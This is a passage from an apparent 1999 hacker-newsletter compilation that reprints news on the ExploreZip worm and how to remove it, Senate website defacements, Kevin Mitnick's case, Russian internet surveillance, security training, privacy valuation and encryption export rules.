After the Melissa virus outbreak that began March 26, the FBI joined other agencies to identify and track down whoever had
created, then spread the virus. On April 1, a 30-year-old New Jersey man, David L. Smith, was arrested by federal and state
officials and charged in the case. He has pleaded not guilty and his case is still pending.
-=-
Data virus forces email shutdowns
By Kim Girard
Staff Writer, CNET News.com
June 10, 1999, 7:10 p.m. PT
update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email
systems nationwide.
The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called
Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft
Outlook on Windows systems to propagate itself, Symantec said.
In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip
spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software
on Windows machines.
Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting
Microsoft Word, Excel, and Powerpoint document files, among others. (See CNET Topic Center on antivirus software.)
Several firms have shut down their email systems entirely while IS staff root out the virus,
according to Symantec.
Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system,
which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said.
The company was still assessing the damage caused by the virus, but the spokesman, who
asked not to be named, said he knew of at least one employee whose entire hard drive was wiped
out.
"As soon as we became aware of it, we told everyone, and we put a message up on our internal
Web site," he said. Late in the day the email still had not been restored. The company hopes to
have it back up by tomorrow.
PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees,
also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system
at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or
how many workers had been affected.
Some companies said they disarmed the virus--actually a software "worm"--before it could cause
many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9
a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The
servers were up and running two hours later, he added.
Employees of antivirus software maker Symantec report that they have received email that
includes the worm, which arrives as an attachment to the missives. Companies such as General
Electric and Southern Company have had files deleted by the virus, according to Bloomberg.
Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from
customers concerning the virus. Thirteen of those calls came from those already infected, she said.
Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a
magazine. She declined to name the companies.
Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's
offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may
have been affected. He said he did not know how many of the company's computers were infected.
Meyer said the Credit Suisse's technology department had been working on the problem for much of
the day and had sent out a warning about it this morning. But he said the virus did not seem to have
slowed the company's operations, adding that it had not disrupted the investment company's stock
trading. Meyer noted that his own email had been working throughout the day.
Quick repairs
Representatives at AT&T and Intel reported that they were able to quickly repair their systems after
being hit by the virus.
"These are things that we have to do because of the communications reality that we live in today,"
an AT&T spokeswoman said.
The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester
Research, where Internet access, including email, was cut off. Another analyst firm, Current
Analysis, sent email to customers warning them not open any email attachments coming from the
firm with the .exe extension because an employee's PC had been infected.
The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. bye."
Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through
Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although
the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files.
"It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center. The worm is
particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or
.asm, he said.
Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as
well as documents created using Microsoft Office applications, such as Word and Excel.
"It singles out those files and destroys them," he said. "This hits the local drive and the file server."
Extent of damage not known
Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in
the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading."
Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely
dangerous"--on its Web site. The company also urged people to update antivirus software.
Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of
her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the
attachment, she added.
The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin
said she got a similar email but didn't open the attachment.
"When I got hit I called all my contacts," she said.
Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report.
-=-
31.1 Removal of the Worm.ExploreZip virus (from MSNBC insert)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HOW TO GET RID OF IT
If your computer is infected, security software company
Network Associates recommends these steps to remove it:
- If you’re running Windows 95 or 98:
Restart your computer in MS-DOS mode, edit the
WIN.INI file and remove the line
run=c:\windows\system\explore.exe.
Then delete the file c:\windows\system\explore.exe and
restart Windows.
- If you’re running Windows NT:
Run REGEDIT (not REGEDT32) and locate the hive
[HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows] and remove the following key:
run=C:\\WINNT\\System32\\Explore.exe
Restart Windows NT, then remove the file
c:\winnt\system32\Explore.exe
- If you’re unsure whether you’ve been infected, Network
Associates recommends that you look in your My Documents
folder to see whether you’re missing any familiar files, or look
in the Sent Messages folder in your e-mail client to see if you
are sending replies with attachments that you do not remember
sending.
Network Associates’ Gullotto warned that if this worm
follows the pattern of recent malicious attachments, network
administrators and users should be alert to e-mails that are
suspicious but do not match exactly the characteristics of
Worm.ExploreZip. Variants and copycats of malicious
software often appear soon after the original.
@HWA
32.0 Senate web site hacked again(!)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
Senate Web Site Attacked, Again!
contributed by FedWatcher
For the second time in almost as many weeks the
official web site of the US Senate has been defaced. A
group known The Varna Hacking Group from Bulgaria
claimed responsibility. (Mirror provided by attrition.org)
Wired
http://www.wired.com/news/news/politics/story/20180.html
MSNBC
http://www.msnbc.com/news/279233.asp
AP via Yahoo
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990611/tc/senate_hackers_1.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
Wired;
US Senate Cracked Again
by Polly Sprenger
4:30 p.m. 11.Jun.99.PDT
For the second time in two weeks,
crackers on Friday defaced the Web page
of the US Senate.
The official Senate Web site was down as
of Friday afternoon while administrators
repaired and restored the network. A
cracker replaced the official page with
one that said "free Kevin Mitnick, free
Zyklon."
An employee of US Senate Technical
Operations said the site went down
around 4 p.m. EST, but couldn't say when
the site might come back up.
"Those of us who haven't been hacked
yet are just trying to lay low and beef up
security as we can," said Sean Donelan, a
network engineer for Data Research
Associates, a nationwide Internet service
provider that works with state
governments, libraries, and schools.
Donelan said that each government
agency is having to reinforce security
independently and that outside vendors
working with the government
departments consider their security
solutions proprietary.
"[We] are also trying not attract
attention and not waving a red flag
challenging anyone to 'test' our security,"
Donelan said.
The Senate home page was previously
cracked on 27 May. In that incident,
crackers filled the page with comments
critical of the FBI. That hack was claimed
by the group Masters of Downloading,
who broadcast the message "MAST3RZ
0F D0WNL0ADING, GL0B4L D0MIN8T10N
'99!" on the Senate's site.
The Varna Hacking Group claimed
responsibility for the latest Web
vandalism. The organization claims it is a
"noncommercial hacking group." Varna is
based in Bulgaria, according to reports of
a 1998 attack that members claimed to
have launched against the Cartoon
Network.
Zyklon, mentioned in Friday's incident, is
alleged to be a 19-year-old hacker from
Shoreline, Washington. He was indicted in
early May for his alleged involvement in
other government site hacks.
Many of the recent hacks demanded
justice for imprisoned cracker Kevin
Mitnick, who has been in jail for more
than four years awaiting trial on a broad
swath of criminal charges.
@HWA
33.0 Mitnick Sentencing Hearing Rescheduled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Macki
This weekend Judge Pfaelzer granted Kevin Mitnick's
defense a continuance, postponing tomorrow's
previously scheduled sentencing hearing until July 12th.
This will give the defense time to verify the damage
claims which may be upwards of $80 million. Although it
is not known for sure some people have speculated that
the recent demonstrations (including a recent LA Times
article on them) may have influenced Judge Pfaelzer to
grant this request. She refused to hear a similar motion
just days before the demonstrations. It is interesting to
note that July 12th is the Monday after Defcon.
FREE KEVIN
http://www.kevinmitnick.com/home.html
Letters Claiming Damage Amounts
http://www.hackernews.com/orig/letters.html
34.0 Russia Looks to Beef Up its Version of Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Merlock
Russia has recently leaked a story concerning its version
of Echelon (the North American spy network system)
called SORM (System for Operational-Investigative
Activities). This group has been around for over a year
now, but a new development has civil rights leaders in
Russia scared. "SORM-2" will require all Russian ISP's to
install black-box recording devices at their POPs at the
ISP's expense!!! Russian web users have exclaimed that
they have been spied on for years, only now they are
going to have to pay for it.
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/russiansonline990612.html
Russians Fight for Net Privacy
Christopher Hamilton
Special to ABCNEWS.com
S T . P E T E R S B U R G , June 11 — In Russia, the
Internet and free are words not necessarily
found in the same sentence.
Russian Internet users continue to struggle against a
state security system mired in Soviet-era attitudes toward
the free flow of information. The latest outrage: a
ministerial act put forward by the Federal Security Service
(FSB in its Russian acronym), the successor to the KGB.
The act would boost the ability of law enforcement to
monitor citizens’ Internet activities.
The new act represents an addendum to an existing
regulation called SORM — the Russian acronym for
System for Operational-Investigative Activities. Currently
awaiting approval from the Russian Ministry of Justice,
SORM-2 would require Internet service providers to
install at their own expense FSB-provided “black boxes”
plus a hotline to the FSB. The devices would enable the
FSB to monitor and record all electronic communications.
Because SORM-2 is a regulation, it requires only
approval from the Ministry of Justice, not review by
Parliament or President Yeltsin. Existing law already
affords the state security apparatus plentiful
eavesdropping possibilities once a warrant is issued.
SORM-2 would expand those capabilities, making full
electronic surveillance as easy as a mouse click for the
FSB.
‘Steps Toward Totalitarianism’
News of SORM-2 was leaked
late last year on the Moscow
Libertarium, a digital-freedom
Web site sponsored by the
Institute for Commercial
Engineering in Moscow.
“SORM-2 is a step toward
removing the checks and
balances between public and
the state,” says Anatoly
Levenchuk, who operates the
Libertarium site. “First they will
start investigations without warrants. Then they will decide
who is guilty without a trial…These are steps toward
totalitarianism.”
“The FSB is used to collecting dossiers on citizens just
in case,” said Yuri Vdovin of Citizen’s Watch, a St.
Petersburg-based human rights organization. “They have
been spying on us for years, but now I am going to have
to pay for it.”
Russian ISPs have already begun to feel the chill.
Bayard-Slavia Communications, a Volgograd-based ISP
that has repeatedly refused to provide information to the
FSB without a warrant, was disconnected from its
network provider in mid-May. The state communications
agency, Goskomsvyaz, cited “improper formulation” of
the company’s contract with the provider,
Moscow-Teleport. Company director Nail Murzhanov
has assembled a team of prominent activists and lawyers
in St. Petersburg and vows to take the matter to court.
Eugene Prygoff of Kuban Net, based in Krasnodar,
also reports FSB pressure. “Things here in the provinces
aren’t like in Moscow and Petersburg. They come and
ask for full access to our clients’ e-mail. Sure, we ask for
a court order and an explanation, but they have power in
the structures that own the ISDN line, so we have to
comply.”
Turning to Encryption
Hoping to prevent invasions of their privacy, many
Russian Internet users are turning to encryption.
According to Maksim Otstavnov, who maintains the
Russian Web site for the encryption program PGP, or
Pretty Good Privacy, hits increased about 10-fold after
news of SORM-2 was leaked to the public last year. But
the official status of cryptography in Russia remains
unclear. In 1995, Yeltsin banned the use of PGP and
other forms of encryption unless it is licensed and
registered with FAPSI, the Russian equivalent of the U.S.
National Security Agency. Whether his decree legally
applies to private citizens is a matter of debate.
The murky state of the law and the lack of public
disclosure leaves citizens uninformed about laws that
affect them. Citizen’s Watch has held numerous seminars
on issues surrounding SORM and computer privacy.
“We need to educate people and get them involved,”
said Vdovin.
Vdovin and Citizen’s Watch are drafting proposals for
the State Duma, Russia’s lower house of Parliament, to
create a system of checks and balances to rein in the
FSB’s domestic spying activities. Meanwhile the shadowy
struggle between the security agency and Internet service
providers continues. According to Anatoly Levenchuk,
“The FSB is already trying to establish ‘volunteer’
agreements similar to SORM-2 with providers. ISPs
failing to comply face pressure tactics ranging from
repeated visits from tax police to building inspectors
threatening to shut them down.”
In Russia, the state has always fought for access to its
citizens’ private communications, while citizens have
fought back as best they could. The battle over Internet
privacy could determine who’s winning this ongoing
struggle.
35.0 Company Claims CyberAttack by Competitor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Seraphic Artifex
Lenox Healthcare Inc. is claiming that its competitor
Vencor Inc. engaged in "dead of night computer
hacking" according to a lawsuit filed in Los Angeles
County Superior Court in California. These actions are
allegedly in retaliation for Lenox's cooperation with a
government investigation of Vencor. The lawsuit claims,
among other things that Vencor broke into Lenox
Healthcare's computer system to prevent Lenox from
processing medical bills. (It will be interesting to see if
these claims can proven in court.)
The Berkshire Eagle
http://search.newschoice.com/nebe/eagleheadlines/99-06-08_clarkesues08a1.asp
Lenox Healthcare suing major nursing home firm
Tuesday June 08, 1999
By Ellen G. Lahr
Berkshire Eagle Staff
PITTSFIELD -- Lenox Healthcare Inc. is suing one of the biggest U.S. nursing home companies, Vencor Inc., for engaging in extortion, death threats
and "dead of night" computer hacking, allegedly in retaliation for Lenox's cooperation with a government investigation of Vencor.
Vencor Inc., a publicly traded company with more than 300 nursing homes and 60 hospitals around the country, carried out "oppressive, unlawful
and often maniacal actions" against Lenox Healthcare, according to a lawsuit filed in Los Angeles County Superior Court in California.
The lawsuit also accuses a Vencor company lawyer of "threatening to appear at [Lenox Healthcare's] office with a gun and 'blow away' " Lenox
Healthcare President Thomas M. Clarke if Clarke didn't make certain payments to Vencor.
Efforts to gain comment from Vencor and its California attorney were unsuccessful yesterday.
Both Clarke and his lawyer also declined to comment.
$28 million deal
Vencor and Lenox Healthcare have been locked in a web of contracts since Lenox Healthcare purchased or leased 30 of Vencor's facilities in 1996 in
a $28 million business deal. About half of the facilities purchased or leased are concentrated in California.
The lawsuit states that Vencor reneged on millions of dollars allegedly owed to Lenox Healthcare, and fraudulently compelled Clarke to pay $8.7
million for a California nursing facility that was worth far less.
Vencor is teetering on the edge of bankruptcy because of an array of regulatory and financial problems, according to financial reports and the
company's own annual report.
The case also claims that:
w After the 1996 business deal was completed, Vencor received millions of dollars in Medicare and Medicaid payments that should have gone to
Lenox Healthcare. Vencor eventually turned over some $4 million to Lenox, but has retained nearly $1 million more.
w Vencor allegedly broke into Lenox Healthcare's computer system to prevent Lenox Healthcare from processing medical bills, "thereby allowing
Vencor to capitalize on the resulting interim financial crisis by extorting" money from Lenox Healthcare.
w Vencor allegedly tried to cut off Lenox Healthcare's receipt of pharmaceutical supplies and therapy services "as a means of extorting further
monies" from Lenox Healthcare.
w The lawsuit also states that Vencor officials spread rumors that Lenox Healthcare was on the verge of bankruptcy, threatened to take over the
business and placed Clarke under "extreme duress."
w Vencor also is accused of undermining Lenox's efforts to obtain bank financing to offset losses created by Vencor's actions.
Lenox claims that the crux of the case involves its cooperation with federal investigators who were probing Vencor's alleged Medicare fraud
schemes.
After the 1996 deal, Vencor retained contracts with Lenox Healthcare to provide certain rehabilitation services to the nursing home patients. Under
the deal, Vencor would provide services such as physical and occupational therapies and then bill the nursing home for the services. The nursing
home would bill Medicare and reimburse Vencor when payments were received.
According to the suit, Lenox Healthcare discovered that Vencor was "padding its bills" for rehabilitation services. Vencor, the lawsuit says, billed the
nursing home for therapeutic services when staff member were actually engaged in marketing and administrative tasks.
Other billing fraud was common as well, said the lawsuit.
Vencor claims Lenox Healthcare owes $9 million for "therapy services," but Lenox Healthcare believes it owes Vencor nothing, the lawsuit says.
The lawsuit claims that Vencor's actions against Lenox Healthcare were motivated "in part by [its] plummeting stock price, a federal investigation of
Vencor's discrimination against and eviction of Medicaid patients, and securities fraud allegations."
The lawsuit accuses Vencor of carrying out a "vendetta" to seriously injure or financially ruin Lenox Healthcare.
According to financial reports, Vencor has been ordered by the federal government to repay $90 million in excessive Medicare reimbursements. The
company also was exposed for trying to evict Medicaid patients from its nursing homes to replace them with more lucrative private-paying patients.
The lawsuit accuses Vencor of earning "a national reputation for erratic, abusive and vindictive conduct in the operation of its business activities."
Lenox Healthcare, a privately owned long-term care company, owns or operates some 100 nursing homes, hospitals and assisted-living facilities
around the country.
@HWA
36.0 LA set to Allow Internet Voting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
The Louisiana Republican Party may allow people to vote
via computer in the Jan. 29, 2000, presidential caucus.
The company VoteHere.Net says its system is one of
the toughest to defeat. One has to wonder just how
tough it would it be to compromise the client side of the
equation with programs like NetBus and Back Orifice
floating around?
US News and World Report
http://www.usnews.com/usnews/issue/990621/internet.htm
@HWA
37.0 CCC Camp Shapes Up
~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by tim
The Chaos Communication Camp, scheduled to take
place later this summer in Germany is shaping up nicely.
There is now a FAQ, registration information and even
some weird video stuff.
Chaos Communication Camp
http://www.ccc.de/camp/
Camp Trailer
ftp://ftp.cs.tu-berlin.de/pub/NeXT/video/movies/quicktime/rendezvous_qt2.mov
HNN Cons Page
http://www.hackernews.com/cons/cons.html
@HWA
38.0 Hong Kong Makes Major Piracy Bust
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by Sinbad
Customs officials in Hong Kong have seized $2 million
worth of of pirated software, production equipment, and
vehicles in what is being called the largest bust of its
kind. Officials confiscated 180,000 thousand pirated
CDROM titles and arrested seven people.
Nando Times
http://www.techserver.com/story/body/0,1634,59240-94420-672929-0,00.html
Hong Kong Customs seize record number of pirated CD-ROMs
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
HONG KONG (June 13, 1999 9:53 a.m. EDT http://www.nandotimes.com) - Customs officials seized 180,000
illegal CD-ROMs along with production equipment in the latest raid to stop rampant copyright piracy,
the government reported Sunday.
Officials seized the record number of computer CD-ROMS, a large quantity of equipment and four vehicles,
worth a total of $2 million, during the raid Saturday, a statement from Customs said.
Seven people were arrested, but no charges had been filed, it said.
Despite frequent raids, Hong Kong remains a center for copyright pirating. Pirated CDs, video CDs and
computer software are widely available at shopping arcades and street vendors at a fraction of the cost
of a genuine copy.
@HWA
39.0 Ernst & Young Profile
~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by afghan
A nice adverticle for Ernst & Young's Global Securities
Solutions Center and its quick response team. Not much
'news' here but a real strong pitch for the 'eXtreme
hacking' course offered by the company. It also
mentions how great the Palm Pilot is.
Kansas City Star
http://www.kcstar.com/item/pages/business.pat,business/30db0e56.611,.html
Here is a link to PalmVNC that allows you to control an
Xserver with a little ol' Palm Pilot as mentioned in the
above article. (Not everything is proprietary.)
PalmVNC
http://www.icsi.berkeley.edu/~minenko/PalmVNC
KC Star;
Hacker U: Company offers security service, training against
computer invaders
By DAVID HAYES - The Kansas City Star
Date: 06/11/99 22:15
These aren't your father's accountants.
There isn't a button-down shirt among these Ernst & Young staffers.
Not one of them is toting a calculator or adding machine. And that
"generally accepted procedures" thing accounting firms like to talk
about? Forget it.
In fact, these employees of the Big Five accounting firm get a little
testy if you even ask whether they have an accounting background.
This is the Ernst & Young nerd squad. They aren't financial
accountants looking for weaknesses in their clients'
accounts-payable procedures. They're computer analysts looking
for holes in their clients' computer security systems and ways to
hack into their payroll.
It's big business.
Ernst & Young has 30 employees in its Global Securities Solutions
Center in Kansas City, new headquarters for a national and
international computer security operation that has 700 employees
worldwide. The operation expects to grow both here and
worldwide and take in about $60 million in 1999 -- up from $12
million three years ago.
"We see this as being the wave of the future," said Lisa Schlosser,
operations leader of eSecurity Solutions for Ernst & Young.
The program addresses computer security issues on several fronts
-- training information technology employees for clients; examining
corporate computer systems for potential holes; and moving in a
"quick response team" if a hacker breaks into a client's computer
system.
The service can be expensive -- $250,000 to more than $1 million,
depending on the size of the client and the company's computer
system, Schlosser said.
Even large corporations with well-protected computer systems are
ripe for a digital break-in, said Eric Schultze, a member of the
quick-response team and anti-hacking trainer for Ernst & Young.
One of the most critical computer break-ins Schultze said he had
worked on involved a company that took security very seriously.
"They had all types of physical security to get into the building,"
Schultze said. "But somebody got in and controlled their computer
systems. It had been going on for four to five days before they
discovered it."
When that happens, Ernst & Young sends in its quick-response unit
-- a team of three or more hacking experts, including some with law
enforcement experience. The team has been called out three times in
the last month.
As computers have become more prevalent in the workplace, the
problem has grown.
"With any large corporation you can almost guarantee they've had a
security breech somewhere," said George Kurtz, another member of
the Ernst & Young team.
To reduce the chance of such attacks, Ernst & Young has set up a
training program for its employees and for clients.
This week, 30 Ernst & Young employees from around the country
and from Canada, Great Britain and Denmark attended the
computer hacking boot camp at the Kansas City center.
The weeklong program, called "eXtreme hacking -- Defending your
site," is a $4,000 training course teaching "the greatest hacks out
there today," Schultze said. And, of course, those who take the
class are taught how to protect security systems from those
computer break-ins.
"We show them things they never thought were possible," Schultze
said.
Students in the class learn things like "account cracking," "exploiting
reciprocal trust," "hijacking the GUI," and various ways to break
into a computer system and find user passwords. On Thursday,
Ernst & Young trainers showed fellow employees how a hacker
could hijack a client's computer -- even rebooting it remotely --
using a Palm Pilot personal organizer.
Ernst & Young has held about 10 classes around the country in the
last year, mostly for the company's own employees. Similar classes
now are planned at the Kansas City center about once a month, and
the program is being opened to clients.
Instructors arrive packing a storeroom's worth of boxes with
notebook computers, routers, networking equipment, servers and
other computer gear. The classroom is set up to simulate various
types of corporate computer systems.
Schultz said the classes grew out of a computer break-in at a big
software company. "We showed the company stuff that amazed
them," he said. "They said, `You guys can do that? Can you teach
us?' "
That's grown into a security practice that includes 23 laboratories
across the country, all connected to a lab in Kansas City. The
Kansas City lab includes every computer environment the company
can think of, so that the latest hacking -- or anti-hacking -- tools can
be tested before being deployed to other offices, Schlosser said.
The initial two-day course has become a weeklong anti-hacking
event with a combination of classroom lectures and hands-on
simulations that end with a hacker's version of a capture-the-flag
contest.
Not just anyone with $4,000 will be able to take the class.
"Obviously, we do some screening," Schultze said. The class is for
"white hat" hackers -- those who hack to find vulnerabilities in
systems, not their "black hat" counterparts who hack to do damage.
The Ernst & Young computer security team uses both easily
accessible hacking software tools and special programs developed
by the company.
The team showed students how to hack into a corporate computer
using a Palm Pilot and a program called PALM VNC. Using the
Palm Pilot's small screen, a hacker could see the hacked computer's
desktop, and even when the cursor moved on the screen.
"That was a pretty cool hack," said Royce Willis, from Ernst &
Young's Chicago office.
Kurtz showed the group another hijacking software program, called
NetBus, that takes hacking a step further. Once a hacker breaks
into a computer and installs NetBus, the program lets the hacker
play sounds on the hacked computer, open the computer's
CD-ROM drive or turn on a microphone attached to the computer
to listen to what's being said in the room, he said.
Schultze said VNC, NetBus and dozens of similar programs were
created as administrative tools for computer systems administrators.
"Any legitimate tool can be used for illegitimate purposes," Schultze
said.
After taking more than three days of anti-hacking classes and
learning that the instructors had secretly put a program on her laptop
that logged every letter or number she'd typed, Jenny Dho, from
Ernst & Young's Montreal office, said she'd learned a lot.
"It worries me for my clients' sake," Dho said.
Dave Morgan, who traveled from Ernst & Young's office in Vienna,
Va., to take the class, said: "Keeping up with this stuff is a full-time
job.
"Every day, something new is released into the wild. Hackers are
always one step ahead of us."
To reach David Hayes, technology writer, call (816) 234-4904 or
send e-mail to dhayes@kcstar.com
All content © 1999 The Kansas City Star
@HWA
40.0 What is Your Privacy Worth?
~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Do you know what value your privacy holds? The $2.3
billion marketing information industry sure does but how
do you convince a court how much your privacy is
worth if you need or want to sue a company for
damages? The Electronic Frontier Foundation intends to
find out. They have started research into the problem of
online identity value to make it easier for people to sue
for damages. One factor in the equation will be how
much companies charge for information, traditional use
of a name for a direct mailing costs around seven cents,
but on the Internet, each customer name is worth 15
cents.
CAL LAW
http://www.callaw.com/stories/edt0614f.html
The Electronic Frontier Foundation
http://www.eff.org/
CAL LAW;
Putting a Price on Our Internet Identities
By Renee Deger
In more moribund moments, many life insurance
policyholders have been known to joke bitterly about how
much they'd be worth dead.
Unfortunately, they have less of a clue of what they're
worth alive, says one longtime plaintiffs lawyer.
That's too bad, because marketing and retail companies are
making a killing at dealing in the habits and preferences of
living people -- information people often simply give away,
knowingly or not.
That cloud of ignorance is about to clear, and the average
person may soon have a better idea of what they're worth
as individuals.
The San Francisco-based Internet think tank Electronic
Frontier Foundation is embarking on an effort to put a price
on the average person's identity so that people can sue for
damages if their privacy is invaded -- especially their
privacy as Web surfers.
"An important part for an individual to negotiate with a
Web site is the total cost of ownership [of themselves],"
says Tara Lemmey, head of EFF.
Still in its infancy, the effort to value individualism will be
based in large part on how much money companies pay for
customer information, and how much companies score for
selling it.
"How many times is [an individual profile of a] person
selling, what's the value each time it's used, at what point
does it decay -- that translates to what it's worth to a
consumer," Lemmey says.
The Internet has already turned the $2.3 billion marketing
information industry on its ear. Traditional use of a name for
a direct mailing is seven cents, but on the Internet, each
customer name is worth 15 cents. Multiply that by millions
of names being swapped millions of times.
"Traditional list brokers jumped right in," says William
Dean, president of San Francisco market researcher W.A.
Dean & Associates.
"Information on the Internet is worth more because people
usually opt in" if they want to get more information or
e-mails, Dean adds.
Online information is so valuable that one start-up company
earlier this year went so far as to offer free Compaq
personal computers to anyone willing to be tracked. The
computers doled out by FreePC, at www.freepc.com, are
worth about $1,000 each, but the company is expected to
recoup the money by selling the information it gleans from
its "customers."
Arnold Laub, a San Francisco plaintiffs attorney, is enticed
by the prospects. "It's something that hasn't really been
analyzed. If it's done right and the economists get involved,
you can make a determination of interest and value," Laub
says.
"The problem is -- most people don't know the value of
their identity," he says.
Other factors of a human life have already been probed in
detail, however. In personal injury and wrongful death
claims, lawyers already can refer to actuarial tables and
economic formulas to value lost livelihood. And in claims
involving famous people who have already sold their
likeness or their creations, lawyers can refer to prior
contract terms.
Whether the EFF's effort produces the same kinds of
wallet-card-type dollar values on death and lost wages that
plaintiffs lawyers utilize is still up in the air, however.
Lemmey says the foundation's in-house lawyers have just
begun to kick around the idea and are hoping to come up
with a model to support broader debates. She says they
want people to become more conscious of the value they
add to commercial enterprises, and how much they can
demand from a company that doesn't keep its promises.
"If a company claims it's for one-time use or internal
purposes only or sells it, what are the damages?" asks
Lemmey. "No one knows."
@HWA
41.0 BSA Tactics Condemned by UK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by Warez Dude
The Birmingham Chamber of Commerce and Industry,
and the Advertising Standards Authority in England have
condemned the practices of the Business Software
Alliance. The two groups claim that recent tactics used
by the BSA in its 'Crackdown 99' campaign are
misleading and overly threatening.
Wired
http://www.wired.com/news/news/politics/story/20217.htm
(url unavailable June 24th - Ed)
@HWA
42.0 US Allows 128bit SSL Into Japan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by secret
Recent changes in the crypto export law have left open
a small loophole that allows 128 SSL encryption out of
the country. The recent export deregulation covered
"online merchants," or electronic shops, if a user goes
directly to VeriSign in the United States, it is possible to
obtain a digital ID for 128-bit encryption at electronic
shops in Japan.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/73414
U.S. Export Loophole Allows 128-bit SSL Encryption to Be Used by Japanese Electronics Shops
June 10, 1999 (TOKYO) -- A loophole in U.S. export restrictions of 128-bit Secure Socket Layer
encryption is allowing Japanese electronics shops to adopt the stringent security method.
It was found that the digital ID for the server that enables 128-bit encryption can be easily
obtained at electronic shops. SSL is a mechanism of encrypted communications between Web
browsers and servers. In Japan, 40-bit SSL encryption is normally used. The 128-bit SSL encryption
is far more secure at 10 to the 26th power. Due to export restrictions imposed by the United
States, the use of 128-bit encryption in Japan was not permitted until December 1998, when the
United States partially deregulated 128-bit encryption exports and allowed their use in financial
institutions and the health care industry. Responding to this export deregulation of the
U.S. government, VeriSign Inc. of the United States began to offer the service to provide Digital
Authentication IDs for 128-bit SSL encryption for overseas countries, including Japan. This service
is called www.verisign.com and it began in April 1999 in Japan. The recent export deregulation
covered "online merchants," or electronic shops, but VeriSign Japan KK did not intend to provide
such general shops with digital IDs for 128-bit encryption because of safety considerations.
Its was found, however, that if a user goes directly to VeriSign in the United States, it is possible
to obtain a digital ID for 128-bit encryption at electronic shops in Japan. Therefore, a highly secure
SSL can be used in Japan as well as in the United States, unless these electronic shops sell drugs and
materials considered to be used as weapons.
(Nikkei Multimedia)
@HWA
43.0 Terroist About to Cause Electronic Chaos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 15th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Massive FUD (Fear, Uncertainty, and Doubt) in this
article. We might as well just give up because the world
will end tomorrow. Terrorists roaming the internet about
to cause massive chaos around the globe. The threat of
electronic terrorism is looming larger and larger each
day.
The Jerusalem Post
Monday, June 14, 1999 30 Sivan 5759 Updated Mon., Jun. 14 08:52
Computer terror can't be ignored
By YONAH ALEXANDER
(June 14) - The latest "Melissa" virus, which spreads via infected e-mail, and
the upsurge of computer intrusion by hackers into the Web sites of the White
House, Senate, and the FBI, have once again focused attention on
cyber-crime and its ominous international security implications.
It should be recalled that in February 1998, Ehud Tenenbaum, an Israeli
hacker also known as "The Analyzer," worked with two young collaborators
from California to mount cyber-attacks against the Pentagon's systems, a
